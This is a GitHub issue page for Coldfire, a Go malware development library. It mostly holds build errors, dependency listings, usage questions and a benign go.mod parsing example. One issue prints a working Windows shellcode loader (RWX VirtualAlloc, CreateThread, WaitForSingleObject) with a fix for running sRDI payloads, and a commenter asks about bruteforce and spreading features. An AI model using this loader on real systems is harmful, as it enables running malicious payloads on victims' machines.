redcode-labs / coldfire
Golang malware development library
License: MIT License
It would be very helpful if you could tag a release. This would enable distributions to fetch the source from GitHub instead of working with checkouts. Easier to track for package maintainers, too.
Thanks
```
go get github.com/redcode-labs/Coldfire: invalid github.com import path "github.com/redcode-labs"
imports github.com/redcode-labs/Coldfire
imports github.com/redcode-labs/Coldfire: import cycle not allowed
```
Any help please?
After updating Golang, XENA has stopped working; more on that at https://xena.network
I reproduced the following issue on two separate Linux machines running Arch-based distros.
Build command: go build .
Output:
```
# github.com/redcode-labs/Coldfire
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/net_linux.go:7:6: Networks redeclared in this block
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/net.go:179:6: other declaration of Networks
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/net_linux.go:25:53: undefined: syscall
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/net_linux.go:27:3: undefined: syscall
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/coldfire_linux.go:26:37: undefined: shellcode
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/coldfire_linux.go:29:30: undefined: shellcode
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/net.go:180:9: undefined: networks
../../../go/pkg/mod/github.com/redcode-labs/!coldfire@v0.0.0-20231123001403-f1b8b578c0b7/os.go:123:9: undefined: usrs
```
main.go:
```go
package main

import cf "github.com/redcode-labs/Coldfire"

func main() {
	cf.B64E("asdasdasd")
}
```
go.mod:
```
module main

go 1.22.0

require github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7

require (
	github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e // indirect
	github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770 // indirect
	github.com/beevik/ntp v1.3.1 // indirect
	github.com/c-robinson/iplib v1.0.3 // indirect
	github.com/fatih/color v1.13.0 // indirect
	github.com/go-sql-driver/mysql v1.7.1 // indirect
	github.com/jackpal/gateway v1.0.7 // indirect
	github.com/lib/pq v1.10.9 // indirect
	github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f // indirect
	github.com/mattn/go-colorable v0.1.11 // indirect
	github.com/mattn/go-isatty v0.0.14 // indirect
	github.com/mitchellh/go-homedir v1.1.0 // indirect
	github.com/mitchellh/go-ps v1.0.0 // indirect
	github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8 // indirect
	github.com/yalue/elf_reader v1.0.0 // indirect
	github.com/ztrue/tracerr v0.4.0 // indirect
	golang.org/x/crypto v0.20.0 // indirect
	golang.org/x/net v0.21.0 // indirect
	golang.org/x/sys v0.17.0 // indirect
)
```
go.sum:
```
github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e h1:Bqtt5C+uVk+vH/t5dmB47uDCTwxw16EYHqvJnmY2aQc=
github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e/go.mod h1:njRCDrl+1RQ/A/+KVU8Ho2EWAxUSkohOWczdW3dzDG0=
github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770 h1:1KEvfMGAjISVzk3Ti6pfaOgtoC3naoU0LfiJooZDNO8=
github.com/anvie/port-scanner v0.0.0-20180225151059-8159197d3770/go.mod h1:QGzdstKeoHmMWwi9oNHZ7DQzEj9pi7H42171pkj9htk=
github.com/beevik/ntp v1.3.1 h1:Y/srlT8L1yQr58kyPWFPZIxRL8ttx2SRIpVYJqZIlAM=
github.com/beevik/ntp v1.3.1/go.mod h1:fT6PylBq86Tsq23ZMEe47b7QQrZfYBFPnpzt0a9kJxw=
github.com/c-robinson/iplib v1.0.3 h1:NG0UF0GoEsrC1/vyfX1Lx2Ss7CySWl3KqqXh3q4DdPU=
github.com/c-robinson/iplib v1.0.3/go.mod h1:i3LuuFL1hRT5gFpBRnEydzw8R6yhGkF4szNDIbF8pgo=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w=
github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk=
github.com/go-sql-driver/mysql v1.7.1 h1:lUIinVbN1DY0xBg0eMOzmmtGoHwWBbvnWubQUrtU8EI=
github.com/go-sql-driver/mysql v1.7.1/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI=
github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=
github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
github.com/jackpal/gateway v1.0.7 h1:7tIFeCGmpyrMx9qvT0EgYUi7cxVW48a0mMvnIL17bPM=
github.com/jackpal/gateway v1.0.7/go.mod h1:aRcO0UFKt+MgIZmRmvOmnejdDT4Y1DNiNOsSd1AcIbA=
github.com/lib/pq v1.10.9 h1:YXG7RB+JIjhP29X+OtkiDnYaXQwpS4JEWq7dtCCRUEw=
github.com/lib/pq v1.10.9/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f h1:B0OD7nYl2FPQEVrw8g2uyc1lGEzNbvrKh7fspGZcbvY=
github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f/go.mod h1:aEt7p9Rvh67BYApmZwNDPpgircTO2kgdmDUoF/1QmwA=
github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
github.com/mattn/go-colorable v0.1.11 h1:nQ+aFkoE2TMGc0b68U2OKSexC+eq46+XwZzWXHRmPYs=
github.com/mattn/go-colorable v0.1.11/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4=
github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y=
github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94=
github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y=
github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0=
github.com/mitchellh/go-ps v1.0.0 h1:i6ampVEEF4wQFF+bkYfwYgY+F/uYJDktmvLPf7qIgjc=
github.com/mitchellh/go-ps v1.0.0/go.mod h1:J4lOc8z8yJs6vUwklHw2XEIiT4z4C40KtWVN3nvg8Pg=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7 h1:iuk+l8Mt1IYimKfF9mdVJ9l7j0PMIdc/c3yvqqNbq2o=
github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7/go.mod h1:xmkgqOYqT/PrBsS/zwfRV0iDky/5MwWhctqfd93xvHU=
github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8 h1:ajJQhvqPSQFJJ4aV5mDAMx8F7iFi6Dxfo6y62wymLNs=
github.com/savaki/jq v0.0.0-20161209013833-0e6baecebbf8/go.mod h1:Nw/CCOXNyF5JDd6UpYxBwG5WWZ2FOJ/d5QnXL4KQ6vY=
github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
github.com/yalue/elf_reader v1.0.0 h1:mJgyV2pk7Lm5BEfVbGrecaMLx6ZZuB/y8eAGm1Gln48=
github.com/yalue/elf_reader v1.0.0/go.mod h1:2WMcv9f54UGq8H2MU4EHstdkSl0L0v2AycubDcDtpVU=
github.com/ztrue/tracerr v0.4.0 h1:vT5PFxwIGs7rCg9ZgJ/y0NmOpJkPCPFK8x0vVIYzd04=
github.com/ztrue/tracerr v0.4.0/go.mod h1:PaFfYlas0DfmXNpo7Eay4MFhZUONqvXM+T2HyGPpngk=
golang.org/x/crypto v0.20.0 h1:jmAMJJZXr5KiCw05dfYK9QnqaqKLYXijU23lsEdcQqg=
golang.org/x/crypto v0.20.0/go.mod h1:Xwo95rrVNIoSMx9wa1JroENMToLWn3RNVrTBpLHgZPQ=
golang.org/x/net v0.21.0 h1:AQyQV4dYCvJ7vGmJyKki9+PBdyvhkSd8EIx/qb0AYv4=
golang.org/x/net v0.21.0/go.mod h1:bIjVDfnllIU7BJ2DNgfnXvpSvtn8VRwhlsaeUTyUS44=
golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20211003122950-b1ebd4e1001c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.17.0 h1:25cE3gD+tdBA7lp7QfhuV+rJiE9YXTcS3VG1SqssI/Y=
golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
golang.org/x/term v0.17.0 h1:mkTF7LCd6WGJNL3K1Ad7kwxNfYAW6a8a8QqtMblp/4U=
golang.org/x/term v0.17.0/go.mod h1:lLRBjIVuehSbZlaOtGMbcMncT+aqLLLmKrsjNrUguwk=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
```
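A check that ties the release-tagging request at the top of this page to the go.mod in this issue, added here as an example (it is not code from the issue or from the Coldfire repository): parse the require directives and flag pseudo-versions, the untagged-commit references that a package maintainer cannot track or audit by release. The type and function names are mine; the input is an abridged copy of the go.mod posted above, embedded as a constant.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// Requirement is one entry from a go.mod "require" directive.
type Requirement struct {
	Path     string
	Version  string
	Indirect bool // carries a "// indirect" comment in go.mod
	Pseudo   bool // version is a pseudo-version, i.e. an untagged commit
}

// Summary is what a quick dependency review of a go.mod boils down to.
type Summary struct {
	Direct, Indirect int
	Unpinned         []string // "path version" of every pseudo-versioned requirement
}

// pseudoVersionRE matches the forms Go synthesises for untagged commits:
// vX.Y.Z-yyyymmddhhmmss-abcdefabcdef and the "-pre.0." / "-0." variants
// derived from an earlier tag, with an optional "+incompatible" suffix.
var pseudoVersionRE = regexp.MustCompile(
	`^v\d+\.\d+\.\d+-(?:[0-9A-Za-z.-]+\.)?\d{14}-[0-9a-f]{12}(?:\+incompatible)?$`)

// ParseGoMod extracts the require entries from go.mod source text, from both
// single-line "require path version" directives and "require ( ... )" blocks.
// Lines inside other blocks (replace, exclude, retract) never look like
// "require path version" and fall through the filter below.
func ParseGoMod(src string) ([]Requirement, error) {
	var reqs []Requirement
	inRequire := false
	sc := bufio.NewScanner(strings.NewReader(src))
	for lineNo := 1; sc.Scan(); lineNo++ {
		line := strings.TrimSpace(sc.Text())
		switch {
		case line == "" || strings.HasPrefix(line, "//"):
			continue
		case line == "require (":
			inRequire = true
			continue
		case line == ")":
			inRequire = false
			continue
		}
		fields := strings.Fields(line)
		if !inRequire {
			// Outside a block only "require path version" counts.
			if len(fields) < 3 || fields[0] != "require" {
				continue
			}
			fields = fields[1:]
		}
		if len(fields) < 2 || !strings.HasPrefix(fields[1], "v") {
			return nil, fmt.Errorf("go.mod line %d: malformed requirement %q", lineNo, line)
		}
		reqs = append(reqs, Requirement{
			Path:     fields[0],
			Version:  fields[1],
			Indirect: strings.Contains(line, "// indirect"),
			Pseudo:   pseudoVersionRE.MatchString(fields[1]),
		})
	}
	return reqs, sc.Err()
}

// Summarize counts direct and indirect requirements and lists the unpinned ones.
func Summarize(reqs []Requirement) Summary {
	var s Summary
	for _, r := range reqs {
		if r.Indirect {
			s.Indirect++
		} else {
			s.Direct++
		}
		if r.Pseudo {
			s.Unpinned = append(s.Unpinned, r.Path+" "+r.Version)
		}
	}
	return s
}

// sampleGoMod is an abridged copy of the go.mod from the issue above (four of its indirect entries kept).
const sampleGoMod = `module main
go 1.22.0
require github.com/redcode-labs/Coldfire v0.0.0-20231123001403-f1b8b578c0b7
require (
	github.com/GeertJohan/yubigo v0.0.0-20190917122436-175bc097e60e // indirect
	github.com/beevik/ntp v1.3.1 // indirect
	github.com/matishsiao/goInfo v0.0.0-20210923090445-da2e3fa8d45f // indirect
	golang.org/x/sys v0.17.0 // indirect
)
`

func main() {
	reqs, err := ParseGoMod(sampleGoMod)
	if err != nil {
		panic(err)
	}
	s := Summarize(reqs)
	fmt.Printf("%d direct, %d indirect; unpinned (no release tag): %v\n", s.Direct, s.Indirect, s.Unpinned)
}
```

On the sample this reports Coldfire itself plus two of its indirect dependencies as unpinned. Pair it with `go mod verify`: the parser tells you which dependencies have no tag to audit against, while the go.sum hashes tell you whether the module cache still matches what was first resolved.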
Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.
Looking at the source for the function, it appears the issue lies with CreateThread being called without WaitForSingleObject afterwards. I added the WaitForSingleObject API call and tested the payload, and it seemed to fix the issue.
```go
// ColdFire implementation
var bg_run uintptr = 0x00
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
procCreateThread := kernel32.MustFindProc("CreateThread")
waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
ptr := (*[990000]byte)(unsafe.Pointer(addr))
for i, value := range shellcode {
	ptr[i] = value
}
threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
// Added by the reporter: wait (INFINITE timeout) for the thread instead of returning immediately.
waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
```
I have noticed that a lot of functions here are calling other functions with a different name.
This is actually unnecessary.
```go
// IsRoot checks if the current user is the administrator of the machine.
func IsRoot() bool {
	return isRoot()
}

// CmdOut executes a given command and returns its output.
func CmdOut(command string) (string, error) {
	return cmdOut(command)
}
```
I hope you folks will remove such functions and de-bloatify the framework.
Hi
Can you please provide a usage example for those of us who are new to Golang.
This is what I have:
```go
package main

import "github.com/redcode-labs/ColdFire"

func main() {
	coldfire.print_good("this is a test")
}
```
The result is this:
```
./main.go:6:3: cannot refer to unexported name coldfire.print_good
./main.go:6:3: undefined: coldfire.print_good
```
Thanks for your time!
Hey, awesome work! Do you plan on bruteforce and additional spreading features?
TODO:
As listed in the TODO list above, some of the parts of code are inconsistent.
`go vet`, `go fmt` and `go imports`
`.MustDoSomethin()` and then `panic` on error. Note that in doc comment.

@451208 as it comes out, I terribly suck at git - I had to sync the repo with my local version (as apparently Oyabun was throwing some compilation errors when the latest, remote version of Coldfire was used) and I decided to force push due to the fact that merge was impossible. As it turns out, your valuable commit simply disappeared and I can't find it anywhere :< Can you please create another pull request with your modifications? I will try to merge it properly this time. Really sorry for the hassle.
Each time I attempt to go get -u the package I get the following error:
```
go get -u github.com/redcode-labs/Coldfire
package github.com/minio/minio/pkg/disk: cannot find package "github.com/minio/minio/pkg/disk" in any of:
	/usr/local/Cellar/go/1.14.5/libexec/src/github.com/minio/minio/pkg/disk (from $GOROOT)
	/Users/zephr/go/src/github.com/minio/minio/pkg/disk (from $GOPATH)
```
Any suggestions on how to remediate?
Version of Go: go version go1.14.5 darwin/amd64
Two tokens should be created and put inside the secrets settings in the repo:
- GITHUB_TOKEN - allows running of automated tests
- CODECOV_TOKEN - allows automatic uploads of test results to CodeCov